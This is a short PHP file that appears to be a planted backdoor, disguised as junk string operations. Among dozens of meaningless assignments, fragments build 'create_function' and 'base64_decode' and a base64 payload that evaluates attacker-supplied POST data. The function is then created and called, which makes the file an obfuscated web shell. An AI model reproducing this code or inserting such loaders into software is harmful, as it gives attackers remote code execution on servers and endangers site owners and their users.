<?php
$nw = $nw.substr("cu0g2str_mkMY1HT51",5,4);
$b5r = stripos("othvnfxm9og16kvy7g3","b5r");
$nw = $nw.substr("yb7creplt7BjiWlC",4,4);
$kml = ltrim("lxpj6uriii3fujo");
$nw = $nw.substr("d69BK5ace",6,3);
$ueio = str_split("a061xuvm36h85",1);
$d = $d.$nw("m7T1","","QGm7T1Vm7T12Ym7T1Wm7T1wm7T1o");
$h1 = str_split("sl0mexgmua9u",10);
$y5 = $y5.substr("fX3q4oID8baseb",9,4);
$wdov = trim("jbqt43lya823uqliu2");
$x = $x.$nw("q2B7","","crea");
$uex4 = str_split("uq2o84kyox5g5camlo",1);
$d = $d.substr("cJF9QT1p80uC8OD",1,6);
$a6 = rtrim("tmpuq8p8k0g5gck95v");
$y5 = $y5.substr("d94j5aNu64_dectvC",8,5);
$kly = rtrim("lld2cnla8hy");
$x = $x.$nw("t2x","","tet2x_funt2xctit2xot2x");
$t039 = stripos("lkswdqdxttv2","t039");
$d = $d.substr("NUWyuR8",0,4);
$d64h = strlen("kj7rdt4le5");
$y5 = $y5.$nw("pK4i","","codpK4ie");
$r20o = strlen("b46r87redg683m7ta35");
$x = $x.substr("anYennu",4,1);
$em = ltrim("yr4bymbno98rfvqm1v3");
$d = $d.$nw("pm4","","dpm40cpm42pm4");
$ucs = stripos("key2eddl8uc80rsy","ucs");
$d = $d.substr("wyeXhzp1Yyeep",0,6);
$ao = strlen("p7q9webroig");
$d = $d.$nw("nEgB","","b2dz");
$mps = str_split("xsin2eus858",3);
$d = $d.substr("cFHM6cldDNWxkdzkGHLJn",9,6);
$jv7y = stripos("l1xfuoix0g5ff09glkb","jv7y");
$d = $d.substr("dU9oC43knXS",7,4);
$rts2 = str_split("muwy9iihb1t",2);
$d = $d.$nw("mg","","k7");
$bhr = ltrim("j8nocgtw8iwvr8sf");
$c = $x("", $y5($d));
$xoyx = strlen("io4r6t8ajkpfxl65qk");
$okm = rtrim("o4ekkpul3tw2siwyfv5");
$e5 = strlen("c0t3xpedefm7h1ux");
$ib = str_split("o342ofrddt",4);
$k0g = ltrim("itummcggnjui");
$nq = rtrim("ela9j9ywdyop");
$ea = trim("xqbpug6orlc6wwjnc");$c();
$sk1e = str_split("p5j0lcgyp52f9n",5);
$thcc = stripos("obswq964lh3akg9g","thcc");
function f9($nb){   };
$k7k = strlen("uw8pnfviss0a7fd");
$ssda = trim("ugxsgr5lrfh31w");
?>